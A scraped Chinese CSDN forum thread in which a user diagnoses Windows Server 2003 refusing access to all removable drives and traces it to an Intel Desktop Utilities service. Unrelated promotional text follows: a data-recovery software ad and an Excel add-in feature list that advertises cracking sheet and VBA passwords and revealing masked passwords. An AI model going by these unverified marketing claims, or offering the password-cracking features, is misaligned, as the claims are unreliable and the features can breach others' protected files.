Win2003无法访问所有可移动存储设备

lqbn 2007-10-30 05:43:17
系统为英文版Win2k3 R2, 未加入域, 未连入局域网, 只是偶尔PPPoE通过ADSL访问Internet. 已经打了SP2补丁, 并开启Windows Update升级安装了所有Hotfix, 一直运行正常。前段时间突然发现无法访问所有的移动存储设备, 光盘和U盘都是如此.

具体症状是:

1. 打开"我的电脑", 可以看到光驱的盘符, 但是插入光盘后, 双击盘符图标, 提示"H: is not accessible. Access is denied.", 其中"H:"为光驱盘符;

2. U盘插上去之后, 也可以正常识别, 在"我的电脑"中也会出现相应的盘符图标; 双击后提示"I: is not accessible. Access is denied.", 其中"I:"为U盘盘符;

3. 另外光驱为DVD-RW, 前段时间刻录光盘一切正常, 但是出现这种情况之后打开Nero刻录软件, 列表中根本就没有光驱, 只有其虚拟的"Image Recorder"; 将Nero完全卸载后重新安装, 问题依旧.


以下是所作的尝试以及相关设置的检查:

1. 登录的用户已经属于Administrators组, 但为保险起见, 还是用默认的Administrator用户登录, 问题依旧; 新建一个用户, 并将其加入到Administrators组中, 然后以这个用户名登录, 问题依旧;

2. 重新启动并进入安全模式, 问题消失, 光驱和U盘皆运行正常; 重启进入Normal模式, 打开设备管理器, 光驱和USB设备上均无感叹号出现, 因此可以排除硬件故障的可能;

3. 打开注册表编辑器, 展开[HKEY_LOCAL_MACHINE\SYSTEM\CurrentCntrolSet\Services\USBSTOR], 右侧"Start"键值为"3"; 展开[HKEY_LOCAL_MACHINE\SYSTEM\CurrentCntrolSet\Services\CDROM], 右侧"Start"键值为"3"; 在命令控制台运行"sc query cdrom"和"sc query usbstor", 均报告当前状态为"RUNNING";

4. 运行gpedit.msc, 依次打开"Local Computer Policy"->"Computer Configuration"->"Administrative Templates"->"System", 检查右边的"Turn off Autoplay", 其设置为"Not Configured"; 强制改为"Disabled", 问题依旧(想来也跟这个无关);

5. 运行gpedit.msc, 依次打开"Local Computer Policy"->"User Configuration"->"Administrative Templates"->"Windows Components"->"Windows Explorer", 检查右边的"Prevent access to drives from My Computer", 其设置为"Not Configured"(想来跟这个也没有关系, 因为出错提示不一样);

6. 运行compmgmt.msc, 依次打开"Storage"->"Removable Storage"->"Libraries", 右键点光驱图标, 打开Properties窗口, 切换到Security选项卡, 检查Administrators组的权限, "Allow"全部都已经勾上, "Deny"全部未勾

早知道Vista的组策略里面有一个专门的选项, 可以同时禁止所有的可移动存储设备, 谁知我的Win2k3已经提前"体验"上了, 呵呵. 现在的问题就是不知道如何让其还原...

本人已经试图通过Google搜索解决办法. 国外也有人碰到过类似的问题, 可好像一直没有人给出切实可行的解决方案。以下是其中的一个讨论贴, 描述的问题跟我所碰到的完全一样:
http://forums.techarena.in/printthread.php?s=20a0c9ad4f82a91e86560fb3aa0b1544&t=737858
...全文
735 16 打赏 收藏 转发到动态 举报
写回复
用AI写文章
16 条回复
切换为时间正序
请发表友善的回复…
发表回复
kingtin 2007-10-31
  • 打赏
  • 举报
回复
你试过在安全模式ok。那么我想问一下你可以试试看用Clean boot的方式进一下电脑看可以用吗。我觉得是3方软件的问题。试试看。
lqbn 2007-10-31
  • 打赏
  • 举报
回复
已检查,没有任何问题。

安全模式下一切正常,应该不是文件缺失的问题。
liyuxuan 2007-10-31
  • 打赏
  • 举报
回复
是不是缺少什么系统文件?SFC查一下!
lqbn 2007-10-31
  • 打赏
  • 举报
回复
可现在的问题是光盘也无法读取,没听说过哪个光盘也用NTFS的吧?

话说回来,如果是NTFS格式的,那倒还有可能是权限设置的问题;可普通的U盘都是FAT格式的,根本无法设置权限。
d93145820 2007-10-31
  • 打赏
  • 举报
回复
有可能移动设备不是NTFS格式的,我以前的2003全盘都用的NTFS格式,FAT32格式的移动硬盘插上去就无法读,虽然在磁盘管理中能看到
lqbn 2007-10-31
  • 打赏
  • 举报
回复
既然是技术论坛,就应该尽量找出问题的根本原因。不要一天到晚把中毒、重装挂在嘴上。出现这种问题肯定不可能是人为误操作造成的,因为组策略里面根本就没有相关的设置项(Vista好像有,可我的系统是Win2k3)。一定是某个软件修改了注册表的相关选项,或者是添加了什么Driver Hook。希望有相似经历的高手给出解决方案,或者是给出一个查找问题的步骤。
lqbn 2007-10-31
  • 打赏
  • 举报
回复
分不够还可以再加。本人有一万两千多的专家分,现在可用分还有一万多。一个帖子的给分上限为300分。只要是提出建设性意见的都可以给分,帮忙解决问题的会另外开帖重谢。
lqbn 2007-10-31
  • 打赏
  • 举报
回复
200分的帖子竟然都无人问津?几年不来,CSDN的人气竟然没落到这种地步了……
lqbn 2007-10-31
  • 打赏
  • 举报
回复
回复15楼:

你没有仔细看我的帖子。我在提问题的时候就很清楚的说明了,可以看到盘符,但是双击无法打开。

你所说的现象是因为Win2k3默认禁止了automounting,有两种解决办法:

1. 你可以通过修改下面的注册表键值来启用这个功能:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MountMgr\NoAutoMount

2. 你可以直接运行mountvol /e就可以,不用改注册表,下次就会自动分配盘符了
newnazi 2007-10-31
  • 打赏
  • 举报
回复
我的移动硬盘有三个分区两个NTFS 一个FAT32 当我使用WIN2003 系统的时候认出移动硬盘但是 我的电脑里面
没有相应的分区,于是我在 计算机管理-磁盘管理 发现认出了硬盘分区但是没有得到相应的盘符 使用"更改驱动器好和路径"
手工添加盘符.
lqbn 2007-10-31
  • 打赏
  • 举报
回复
问题已解决, 多谢11楼的建议!

通过使用msconfig逐一停用非Microsoft的系统服务, 筛查出是AWService这个服务的问题. 经查询得知, 这是"Intel Desktop Utilities"这个软件所用到的一个服务, 将该软件卸载重装之后, 问题彻底解决.

"Intel Desktop Utilities"是Intel主板附送的一个软件包, 我所安装的是Lite版本, 只有查看CPU温度、风扇转速等基本功能, 其完整版可能附带有桌面管理的功能, 不过我没有仔细研究过. 这个软件是两年前安装系统之后装上的, 一直没有出现什么问题. 到底是何原因致使其配置发生改变, 目前尚不得而知.

不管怎么说, 问题现在已经得到了彻底解决. 再次感谢11楼kingtin的建议!
lqbn 2007-10-31
  • 打赏
  • 举报
回复
回复12楼:

CMD和TotalCommander下都试过了,问题依旧。用Process Monitor跟踪,都是IRP_MJ_CREATE被ACCESS DENIED掉了。

回复11楼:

目前这个机器暂时无法重启,我也怀疑可能跟不良的Driver Hook有关。试过之后上来报告结果。
scz123 2007-10-31
  • 打赏
  • 举报
回复
安全模式可用,那软件问题可能性很大

尝试在cmd下进行访问,看看是否可行
lqbn 2007-10-30
  • 打赏
  • 举报
回复
回复1楼:

不知添加分区有什么作用?访问硬盘分区没有任何问题,只是访问移动存储设备才有问题。


回复2楼:

如果有这么变态的病毒,我倒还真想研究一下。用Process Monitor观察了一下,劫持的是IRP_MJ_CREATE这个操作,返回的结果直接就是ACCESS DENIED。

个人觉得应该还是注册表哪个地方的设置有问题。
id7537306 2007-10-30
  • 打赏
  • 举报
回复
你装杀毒软件没 要是没装建议你装一个杀杀毒 只要你上过Internet 就有可能中毒

建议杀毒
newnazi 2007-10-30
  • 打赏
  • 举报
回复
重新添加分区 实验一下
极限数据恢复专业版软件,本软件免费使用,不限恢复文件个数,不限恢复文件大小!可以有效解决各种软件、病毒或人为误操作引起的文件、数据丢失问题!比如:硬盘重新分区了,重装系统后只剩一个盘,分区合并数据丢失、磁盘未初始化,误删除文件、文件或目录损坏且无法读取、分区无法访问、磁盘参数错误、函数不正确、设备未就绪、设备硬件出现致命错误,导致请求失败、数据错误循环冗余检查、由于IO设备错误,无法运行此项请求、执行页内操作时的错误、此卷不包含可识别的文件系统、操作无法完成,因为磁盘管理控制台视图不是最新状态、误格式化分区、误分区、文件不能复制、分区打不开、提示RAW等都可以完美恢复出数据是一款专业级别的数据恢复软件。 软件特色 1、支持多种设备:硬盘、移动硬盘、U盘、sd卡、内存卡、相机卡、手机卡等多种存储设备; 2、支持多种分区方式和文件系统:传统的MBR分区方式、最新GPT分区方式、动态磁盘卷、FAT16/FAT32/NTFS/exFAT等文件系统; 3、支持多种文件格式:jpg、jpeg、bmp、png等常见图片格式,doc、xls、ppt等办公文件格式,html、PHP、txt等文本格式,mp3、mp4、rm、mkv等多媒体格式,rar、7z、zip等压缩文档格式,总计支持数百种文件格式; 4、兼容全线Windows系统:完美兼容Win2000、WinXp、Win2003Win2008、Vista、Win7、win8、Win10、WinAll; 5、急速扫描智能分析:基于底层存储技术,扫描速度极快,多线程分析处理数据,不用完全扫描即可分析全盘数据 使用方法 1. 打开软件后,选择需要恢复的盘,点《开始恢复》 2. 等待软件扫描完成. 3. 勾选需要恢复的文件,点《另存为》按钮。 4. 选择合适的文件保存路径,等待软件将数据全部复制出来就可以。
EXCEL集成工具箱V8.0 多国语言版(2003-2010通用)增强版! * 软件大小: 22.90MB * 软件授权: 免费共享软件 * 软件语言: 多国语言[中文繁体/简体/英文] * 开 发 商: 创思维软件工作室 * 更新时间: 2010-09-22 * 应用平台: Win9X/Win2000/WinXP/Win2003/Vista/Wind7 Excel集成工具箱8.0是利用VBA(Visual Basic for Applications)语言编写的增强应用型插件。包括160个菜单功能和100个左右 自定义函数,集160个工具于一身,但体积小于16MB。当安装集成工具箱后,如果您使用Excel 2003,则将产生【工具箱】菜单, 包括160多个子菜单;如果您使用Excel 2007或者2010,将产生【集成】与【工具箱】功能区。根据各功能的特点,对子菜单 作了18个分类, 而在函数向导对话框中也生成100个左右新的函数,用于扩展Excel的计算功能。且所有功能都通用于 Excel 2002、2003和2007、2010。支持中英文显示与繁简体操作系统、拥有20多款华丽的皮肤界面,支持Excel2007全面 隐藏选项卡,这个插件还模拟了一个Excel2003样式的菜单,目的就是方便那些从Excel2003转向使用2007或2010版的朋友使用。 ============================================================================================ 下载地址(集成工具箱本身3.84MB,解压后超过16MB,不含帮助文件): 网盘下载:http://www.brsbox.com/jackeyliang(含帮助,解压超过50MB) 共享资料下载: http://ishare.iask.sina.com.cn/f/10201782.html EXCEL集成工具箱V8.0完整增强版.rar 多特软件站下载: http://www.duote.com/soft/1495.html EXCEL集成工具箱V8.0完整版.rar (22.90MB) 非凡软件站下载: http://www.crsky.com/soft/22056.html EXCEL集成工具箱V8.0完整版.rar (22.90MB) 绿色软件站下载: http://soft.syue.com/soft/98/99/2010/2010081491963.html EXCEL集成工具箱V7.0完整版.rar (19.42MB) 软件屋下载: http://soft.softhouse.com.cn/software/show/76357.html EXCEL集成工具箱V7.0完整版.rar 大观软件站下载: http://guansky.com/soft/html/15828.html EXCEL集成工具箱V7.0完整版.rar IT资讯平台下载: http://download.it168.com/547/1483/index.shtml EXCEL集成工具箱V7.0完整版.rar ============================================================================================= 本工具箱160个菜单工具的功能介绍如下: 分类 功能名称 功能介绍 繁简转换 【简体转繁体】 将选中区域存储格的简体字批量转换成繁体。 【繁体转简体】 将选中区域存储格的繁体字批量转换成简体。 【综合计算显示】 综合计算并显示选中区域存储格的最大值、最小值、平均值、求和、存储格个数、筛选状态下的的加总求和,以及显示选区包含的数字、字符、汉字的个数等信息。 【GB2转BIG5】 将选中区域存储格的简体字(GB2)批量转换成繁体操作系统的繁体(BIG5)。 【BIG5转GB2】 将选中区域存储格的繁体字(BIG5)批量转换成简体操作系统的简体(GB2)。 完 美 背 景 着 色 【选区背景】 默认启动智能着色方式,此功能会清除一部分背景颜色,但对工作表中的条件格式会作完全保留,丝毫没有影响。最大的特点是支持屏幕行列捲轴的操作而不影响显示。 【选区背景选择】 进行着色功能切换,支持行着色、列着色、行与列同时着色、智能着色、选区着色、反向着色共6种方式供选择,可以自定义56种基本及颜色板任意着色颜色。 【条件背景】 默认启动智能着色方式,此功能不会清除背景颜色,但会对工作表中的条件格式作自动清除。最大的特点是支持屏幕行列捲轴的操作而不影响显示。 【条件背景选择】 进行着色功能切换,支持行着色、列着色、行与列同时着色、智能着色、选区着色、反向着色共6种方式供选择,可以自定义56种基本及颜色板任意着色颜色。 【高级背景】 将选择的行进行颜色标示,以突出当前行,有利于数据查看。可以随心所欲地定义颜色,还可以自由调整颜色的深浅。本工具相对于同类工具有不破坏背景色、条件格式、复制粘贴和撤消功能之优点。 【高级背景选择】 背景着色的高级功能,支持行着色、列着色、行与列同时着色共3种方式供选择。 快捷取数 【快捷取数列】 随存储格即时移动的快捷数据清单,可取任意区域的数据为唯一值清单,提高数据录入效率。最重要的是清单的最后6项为子程序功能,点击则可以完成增加清单显示宽度,选中或反选所有清单、写清单到任意存储格、重新加载数据等操作。也可以重新加载另外一区域或某几列的数据,也可以重新设定功能的生效存储格范围。 【快捷取日期】 随存储格即时移动的快捷日期数据清单,且有已录入日期的记忆功能。所有快捷取数工具都具有使用30秒钟则自动隐藏功能,用户可以决定是否取消其自动隐藏清单。 【快捷综合取数】 功能较功能更强大,支持同时取6个不同存储格区域(或列)为6个唯一值清单,并在指定的6个不同的生效范围自适应地显示对应的清单。清单的最后6项也为子程序功能,能完成相关操作。且支持重新加载数据及重设定生效存储格范围。 财 务 工 具 【自动填充】 不同于EXCEL的CTRL+D功能,能对选中的某列数据不同存储格区域的空白处,取相邻的上一不为空的存储格内容同时作数据源的自动填充。1分钟内能处理手工需几小时才能完成的几万行ERP或KingDee原始数据。极力推荐的工具之一。 【取唯一值】 能瞬间取任意存储格区域的内容为不含重复值的唯一值清单,加载到工具中并提供随时随地调用,具有重复加载与读写的特点。 【添加注解】 可视化地窗体添加与修改注解功能。提供50种美观大方的批注样式供选择,支持图片背景批注与批量写批注。最大的优点是将指定的任意区域按每个存储格内容为一行加入到当前批注中,允许批注内容中是否显示行号。 【连接字符串】 可视化地窗体连接字符串功能。能将最多三个任意区域存储格(或列)的内容按自定的分隔符号连接成一个字符串写入指定的存储格或新工作表中。可以生成含重复值与不含重复值并可选是否排序的连接字符串。连接上万个字符只需短短1分钟即完成。 【隔行插入】 在当前工作表中允许从M行到N行,隔X行插入Y行,并允许是否需复制标题Z行。 【制作工资条】 瞬间将工资明细表生成工资条,方便打印并裁剪。可以自己定义工资条标题的行数以及相隔行数、插入行数等。并能动态地显示运行过程,支持程序运行后中途暂停。 【恢复工资条】 能将已生成工资条的工资明细表,快速地还原为初始状态,支持多种参数设定。 【生成数据列】 生成发票号码序列的得力助手,可以生成任意的奇偶数列,差值或倍值或者递增、递减的任意有理数数据序列,支持先行后列与先列后行两种方式,支持瞬时恢复清除。 【取RMB张数】 根据员工的工资计算需要多少张100元、50元......1元的钞票,可以批量累计计算。发现金工资的财务工作者的必备工具之一。 【数字转英文】 将选中区域(默认)或已使用区域存储格的金额数字转换成英文格式显示的表达字符串,为三资企业制作客户外汇付款通知书的理想工具。 【文本转EXCEL】 将文本文件按指定的分隔符号分隔一次性导入到EXCEL文档中。提供两种导入方式。 【EXCEL转文本】 将当前工作表中存储格的内容按指定分隔符号导出为TEXT文本,此为银行代发工资数据与邮局或银行传递数据的便利工具之一。并提供两种方式的转换。 成本核算 【取唯一值】 还在使用或功能对数据进行唯一值的繁锁操作吗? 本工具可快捷方便地取任意选中区域的存储格内容为唯一值清单,快捷且高效。 【取产品型号】 功能较在字符串中取数字强大多倍。能批量取某列存储格按指定长度的数字并允许特定数字串的获取,例如M76000,RC76000等。而小于指定长度的数字串则不予获取。 【快速选定数据】 可瞬间选中与用户指定内容相同的当前工作表中所有存储格,方便选定、清除内容或其他操作,支持选中字体彩色是否着色。 【取型号使用范围】 取MATCH的两列数据(Relating Area)中对应MODEL的使用范围(Where Used)。 常 用 工 具 【繁简转换】 可视化的繁简体GB与BGK码以及GB2与BIG5码相互转换,可以复制文本到当前窗体中文本进行转换,也可以实现单个文件或批量文件的转换。在窗体中双击文本字符串尾即可实现自动选定文本并自动复制功能。本工具较同类转换工具准确率达100%。 【背景颜色】 提供可视化的可选择着色方式的背景着色功能,默认启用智能着色。 【文件批量改名】 功能完善的文件或图片批量改名工具。细分为多方式改名,优点明显。例:替换字符串就支持起始长度、替换个数、GB2与BIG5码相互转换等多选项操作,也支持文件扩展名的修改。现为市场上功能最强大的一款文件及图片批量改名工具。 【工作表保护】 对当前工作薄中的各工作表批量一次性用指定密码进行锁定与解锁操作。 【工作表隐藏】 对当前工作薄中的各工作表批量一次性进行隐藏与取消隐藏操作。 【新建工作表】 批量新建或者复制工作表,依指定存储格内容可以瞬间建立/复制1到255个。还可以在新建或复制时全自动命名。分为自动新增方式与依指定存储格内容两种方式。 【插入批注背景】 可以选定任意一幅图片为批注背景来插入一个带图片背景的批注。可视化窗体操作,可随时更换批注样式,也支持批量多存储格样式修改。 【插入行数】 对工作表隔行插入行并可以复制标题行,其中对相隔行数、插入行数等可以自定义。 【注解样式】 可以插入多达50种样式的注解,支持随时切换当前注解样式为指定的样式。 【工作表拆分】 将当前工作表的某列数据按指定条件拆分成多个工作表,可以用任意列的数据以及选定的数据做为拆分条件。 【行列奇偶选择】 可视化对当前工作表的行与列进行快速的奇偶行或奇偶列快速选定操作。 【查找与替换】 增强型EXCEL内置查找与替换功能。可以按设置搜索任何字符串(包括*或?符以及公式中包含的某字符),也可以将搜索结果写入到一新的工作表中以备查。 【工具箱选项】 集成工具箱的基本选项设置。基本分为。其中功能窗体显示区(NoTaskbar)功能可设置本工具启用的窗体图标是否在状态栏显示,并允许切换功能。 扩 展 工 具 【屏幕截图】 可以截取屏幕任意一区域并复制或另存为图片,可随意更改大小,操作灵活性特强。 【屏幕取色】 经典的屏幕取色工具,可取任意一处屏幕颜色到指定的存储格中,可显示为RGB颜色值或十六进制的颜色值,为VBA开发人员的辅助工具之一。 【万年日历】 可以查询所有节、假日信息和公农双历,以及计算两时点间的相隔天数等。 【LED时钟与样式】 超漂亮的LED时钟,有默认时钟、蓝色时钟、经典时钟三种样式供选择。 【系统常用工具】 系统常用工具的快捷调用,例如:计算器、记事本、WORD、画图板。 【隐藏选项卡】 可以隐藏Excel2007及2010功能区的各选项卡(如:开始、插入、开发工具等)。 图 片 工 具 【选择本表图片】 将工作表中的图表导出为图片保存起来。 【批量导入图片到右列】 批量将图片导入到工作表中对应图片名字的右边。 【将选区转换成图片】 将工作表中的当前选中区域另存为图片。 【一键导出图形】 将工作表中的图片导出为图片文件。 【导入图片到工作表】 将磁盘中的图片导入到工作表中。 【删除选中区域图形】 将工作表中当前选中区域的所有图片与图形删除。 【删除所有导入图形】 将工作表中存在的所有图片与图形瞬间删除。 【批量导入图片】 将指定文件夹或包含子文件夹中所有图片瞬间(也可以按对应名称)按指定图片大小导入EXCEL中。允许一次性多图片格式(*.JPG/*.GIF/*.BMP/*.PNG),且支持模糊与非模糊方式导入图片,还可以在导入的图片上显示其文件名称以易于管理。 【批量导出图片】 将EXCEL中指定某列中的图片按显示图片大小导出到指定的文件夹中。 批 注 工 具 【插入样式批注】 提供50种花样的批注供选择,可随时更换,且美观大方。 【插入图片批注】 不仅提供多样的批注供选择,且支持批注中加入图片背景。 【批量修改批注】 批量一次性修改选中存储格区域批注的样式。 【批量图片批注】 可批量将图片生成带图片背景的批注。 【批量名称图片批注】 可批量将图片依对应名称生成带图片背景的批注。 【显示与隐藏批注】 显示或隐藏工作表中选中区域的批注。 【可视化批注】 可视化地窗体操作添加与修改注解完整功能。 安全工具 【工作表解密】 可以破解工作表密码和工作簿密码。在不知道密码的前提下找回密码。 【VBA工程解密】 将有密码的VBA工程代码破解,直接打开即可修改代码。相当于VBA工程免密查看。 【隐藏与显示磁盘】 隐藏与显示磁盘本地磁盘盘符(无需重启动)。 【端口进程查询】 查看本机开放的系统端口以及使用该端口的进程一览表。 系 统 工 具 【锁定屏幕】 快捷一键式登出当前用户并锁定电脑,类似于CTRL+ALT+DEL功能。 【系统待机】 使用此功能可以达到节能及锁定电脑一键式进入系统待机状态,再次使用时恢復速度是最快的,一般五秒之內就可以恢復到上次使用状态而无需要重新开机了。 【锁定鼠标】 可即时锁定屏幕鼠标且支持密码锁定,有密码才可以解锁恢复被禁止的所有操作,能屏蔽所有的系统按键如:ALT+F4、CTRL+ALT+DEL、ESC、WIN等,支持桌面锁。 【任务管理器】 增强型的系统任务管理器,提供进程的PID及路径、进程文件属性及详细说明,以及进行结束进程与删除进程及设置LEVEL等操作。 【系统功能信息】 系统功能调用及相关信息,关闭电脑、重启电脑、电脑使用时间、磁盘剩余空间。 【查看IP信息】 查看本机LAN局域网的IP地址以及WAN外部网的公共IP地址(需要接入Internet)。 【显示桌面】 快捷的一键式显示桌面,有时桌面图标找不到时特别有用。 【资源管理器】 快捷的打开系统IE资源管理器,便于游览与管理文件夹与文件目录。 【系统分区表】 查看系统分区表与引导区(BOOT)内容,备份起来以防止CIH病毒的破坏。 函数工具 【插入函数】 以对话窗体方式插入类别中大约一百个左右的自订增益函数。 【函数帮助】 提供最常用的绝大多数自订增益函数的详细说明信息。 【函数实例】 以实例文档Function Sample.xls来列举常用自订增益函数的使用方法举例。 快 捷 工 具 【快捷简转繁】 将当前工作表中所有存储格的简体字批量转换成繁体,如果选NO时,则还包括当前工作表中的所有窗体控件中的文本也进行转换。 【快捷繁转简】 将当前工作表中所有存储格的繁体字批量转换成简体,如果选NO时,则还包括当前工作表中的所有窗体控件中的文本也进行转换。 【隐藏非使用区】 对当前工作薄中各工作表未使用区域进行快速隐藏。 【删除空白行】 以当前工作表已使用区域中的空行进行快速删除。 【反向选择】 选择当前选中区域相反的已使用存储格。 【数字转英文】 将当前工作表中所有存储格的金额数字转换成英文格式显示的表达字串,在确认之前可以更改选项以转换为值或用公式表达两种方式供选择。 【删除超级链接】 瞬间删除当前工作薄中所有的超级链接。 【删除工作薄链接】 瞬间删除当前工作薄中所有的地址引用链接。 【工作表目录】 对当前工作簿的所有工作表建立目录与编号,且生成链接,单击可以打开工作表。 【建文件夹目录】 可按选中存储格内容或者当月日期天数值来创建文件夹到指定文件夹中。 【建工作表及目录】 可按选中存储格内容或者当月日期天数值来创建EXCEL文档到指定文件夹中。 【取文件目录】 对指定文件夹中的文件在Excel中建立目录,且生成链接,单击可以打开对应的文件。 【IE论坛收藏】 将IE游览器收藏夹中的WEB地址名称及链接写入EXCEL中保存起来。 【ABC序列】 为EXCEL生成一个可用鼠标拖值处理的A-Z字母序列,一次生成,重复使用。 【百家姓序列】 为EXCEL生成一个可用鼠标拖值处理的百家姓序列,一次生成,重复使用。 【压缩工作薄】 对当前工作薄进行压缩减肥操作,适当缩小文件大小。 【数字小字转大写】 将选中区域存储格的小写金额批量转换成中文大写金额。 【数字大写转小写】 将选中区域存储格的中文大写金额批量转换成小写金额。 【筛选复制可见】 在筛选状态下,对选中区域复制时不复制已隐藏的内容,支持Excel2003以下版本。 【选中相同值】 可瞬间选中与当前某存储格内容相同的工作表中所有存储格,比多次选中操作省时。 【修复EXCEL】 当您的Excel某些功能无法使用时,或者无缘无故多出很多菜单、工具栏时,本工具可以瞬间恢复Excel到默认状态,本功能较同类工具清除更彻底。 合 并 唯 一 值 工 具 【筛选选区唯一值行】 以选择区域左边一列为条件进行唯一值筛选,输入1则删除重复值所在行,输入2则隐藏重复值所在行。 【消除选区重复值】 将选择中重复出现的数据删除,显示唯一值的数据序列。 【突出显示重复值】 将选择中重复出现的数据均以圈号标示出来。 【生成随机不重复值】 在A列生成指定数据范围1-9000000以及上的随机数序列。 【控制单列不重复值】 可控制任意一列(取值1-255表示A-IV列)存储格内容的是否出现重复值,当出现重复值时则自动适时弹出信息提醒,若取消控制(取0或空值)即可。 【可还原之合并】 用此功能对存储格合并后,可在任何时候还原为合并前的状态。 【还原合并数据】 对一列中合并后的单元格取消合并,且恢复合并前所有数据。 【还原合并且填充】 对一列中合并后的单元格取消合并,且用第一个存储格值进行向下与向右填充。 【合并数据并复制】 可以将一个区域的数据直接复制粘贴到一个单元格中。 【合并数据并居中】 合并居中数据,可以保留合并前的所有数据。而且取消合并后可以还原数据,强过Excel自带的合并 居中多倍。 【可视化合并数据】 用显示窗体可视化操作对存储格字符串进行合并连接。 增强插入 【插入FLASH动画】 将Flash动画嵌入到工作表中,并播放,可以随意定制Flash动画的显示大小和位置。动画嵌入工作表中,删除FLASH原文件不影响Excel中的效果,且允许是否需要保留Flash的缩放等操作菜单。 【插入GIF动画】 将GIF动画插入到工作表中播放,可以随意定制GIF的大小和位置,删除GIF原文件不影响Excel中的效果。 【插入MV动画】 将MV等多媒体动画或电影插入到工作表中播放,可以定制MV视频的大小和位置。 增 益 工 具 【存储格加解密】 对工作表选区的数据进行加密,转换成乱码,有密码才可以查看。第二次执行时即可以恢复数据。理论上支持反复加密,但解密时需用相对应的密码。 【文本文件加密】 对文本TXT文件进行加密与解密操作。 【禁用USB使用】 禁止USB的即插即用功能,防止他人非正常使用外存储设备(无需重启动)。 【启用USB使用】 恢复USB的即插即用功能(无需重启动)。 【清除历史记录】 彻底清除垃圾文件、临时文件、IE缓存、历史记录、升级下载记录、IE地址记录、运行记录等,为系统磁盘赢得更多的剩余空间,较同类清除工具效果更明显。 【修改文件时间】 可随心所欲修改文件的创建、修改、访问时间,包括年月日时分秒,支持修改单个文件、批量文件以及包括子文件夹等多种方式修改。 【下载地址转换】 可在讯雷(Thunder)、网际快车(FlashGet)、QQ旋风(Qqdl)、普通地址(Http)之间相互转换下载地址,这样就无需同时安装多个下载工具了,为下载提供了方便。 【星号密码查看】 拖动图标到任何程序窗体中的密码框上方,即可将其密码显示出来。用IE密码查看器还可查看IE游览器(包括傲游览器)WEB网页中的密码框中的密码。 【程序调试工具】 用作程序自身的DEBUG调试与程序崩溃的自动修复等。 动 画 工 具 【鼠标跟随动画】 非常灵活的鼠标跟随动画,有四种样式自动切换且支持各种显示参数值设定,可以修改参数固定为其中的一种动画方式。 【显示茸茸小兔】 可爱的茸茸小兔显示在屏幕右下角,仿瑞星杀毒软件的卡卡动画。 【启用特效动画】 随鼠标选中不同存储格变化而出现的6个绿色自转动环的特效动画,第一次有了“这是在使用EXCEL中的功能吗”的惊奇。有随鼠标移动(选YES)与不随鼠标移动两种方式,可以通过禁用此动画。动画工具中的经典之一。 【多个休闲动画】 具有休闲与娱乐于一体的多个动画:喜悦黄鹂、勤劳蜜蜂、经梅迎春、青青竹子、时针指南、葡萄熟了、果实累累、花好月季等。为EXCEL增添一丝喜色。 【关闭所有动画】 一键迅速关闭所有已经打开的休闲动画。 休 闲 工 具 【媒体播放器】 简洁媒体播放器,可打开MP3、MP4、MPG、DVD等几乎所有格式的多媒体文体。 【播放FLASH】 支持打开所有SWF格式的FLASH文件进行播放,可以暂停或按帧播放。 【屏幕放大镜】 可以缩放屏幕任意区域,支持0.5倍、1倍、2倍、3倍、6倍放大效果。 【屏幕画笔】 可以手写并在当前屏幕背景图上圈、点、划、作波浪标记等均可,并可将结果保存为图片文件或插入到Excel中,可自定画笔粗细与颜色选择,支持随时清除所有标记。 【俄罗斯方块】 非常经典的俄罗斯方块积分小游戏,支持鼠标操作与键盘方向键(或WSADZ键)两种操作方式,空格与回车键为暂停切换键。 【在线音乐】 非常流行的网络在线音乐播放器,自动加载最近音乐排行榜,也可按名字或歌星搜索到最热的歌曲并加到播放清单中。 开 发 辅 助 【获取系统菜单】 获取VBA编程人员需要的关于菜单及及控件的名称及ID等相关信息。 【生成系统图标A】 VBA编程人员常用的工具。可以每页500项查询Excel内部图标及FaceId。 【生成系统图标B】 VBA编程人员常用的工具。增强查询与写Excel内部图标的ID号于空白的工作表中。 【显示基本颜色值】 显示最基本的56种基本颜色ID、名称与相对应的RGB颜色值以及网页颜色值。 【删除注释行】 可以瞬间清除当前工作薄中的所有模块、类模块及VBA子程序中的所有注释语句。 定制开发 【定制功能模块】 根据客户需求定制开发的模块功能:Aging库存报表、ERP存货报表、BOM表整理、标签制作、付款通知书、报表格式转换等。 帮助工具 【集成工具箱】 关于本工具必要帮助以及作者(梁瑞春)的EMAIL、个人主页、联系方式等相关信息。 【中英文显示】 支持繁简体操作系统,以及多语言显示:中文简体(黙认)、中文繁体、英文显示。 【更换皮肤】 支持窗体界面的皮肤切换,具有二十多款超漂亮的皮肤包供免费选择。 【仿2003样式菜单】 开始使用2007版朋友来说,有很大的不适应。这个插件模拟了一个Excel2003样式的菜单,目的就是方便那些从Excel2003转向使用2007或2010版的朋友使用。 100个左右的自订EXCEL内置增益函数: 分类 函数名称 功能介绍 字  符  转  换 GB2BIG5 将存储格的简体字(GB2)转换成真正繁体字(BIG5)。一个参数即单元格引用。 BIG5GB2 将存储格的真正繁体字(BIG5)转换成简体字(GB2)。一个参数即单元格引用。 JianToFan (JtoF) 将存储格的简体字(GB2)转换成繁体字(GBK)。一个参数即单元格引用。 FanToJian (FtoJ) 将存储格的繁体字(GBK)转换成简体字(GB2)。一个参数即单元格引用。 ColumnNumber 将某字符所表示的列(或某单元格引用)转换为数字形式所表于的列号。一个参数取值范围为A--AZ。例如: ColumnNumber("AZ")=52表示为第52列。 ColumnText 将某数字所表示的列号(或某单元格引用)转换为字符形式所表于的列。一个参数取值范围为1--702。例如: ColumnText(256)=IV表示为IV列。 NumUpper 将存储格的小写数字金额转换为中文大写金额。一个参数即单元格引用。 NumLower 将存储格的中文大写金额转换为小写数字金额。一个参数即单元格引用。 NumtoEnglish 将存储格的小写金额转换为英文字符串表示的金额。第一个参数即单元格引用,第二个参数可省略,最标准的英文表达方式。 SpellNumber 将存储格的小写金额转换为英文字符串表示的金额。一个参数即单元格引用,适合美国美元表达习惯。 TextReverse 反转(倒置)文本字符串函数。一个参数即字符串表达式或单元格引用。 字  符  操  作 ChineseBiHua 取存储格的中文汉字的笔画。一个参数即单元格引用或中文汉字字符串。 Found 查找某字符在某字符串表达式的位置。第一个参数为要查找的字符串,第二个参数为字符串表达式或单元格引用,第三个参数为查找到的第N个字符串,若省略则表示查找第1个字符串。例如:Found("A","ABCDAEFGHAAA",3)=10 GetModelNumber 取产品MODEL型号。第一个参数为产品的英文数字描述的字串,第2个参数为指定MODEL型号的长度(默认为4),第3个参数为MODEL型号间的分隔符号,可任意。 GetMoneyPcs 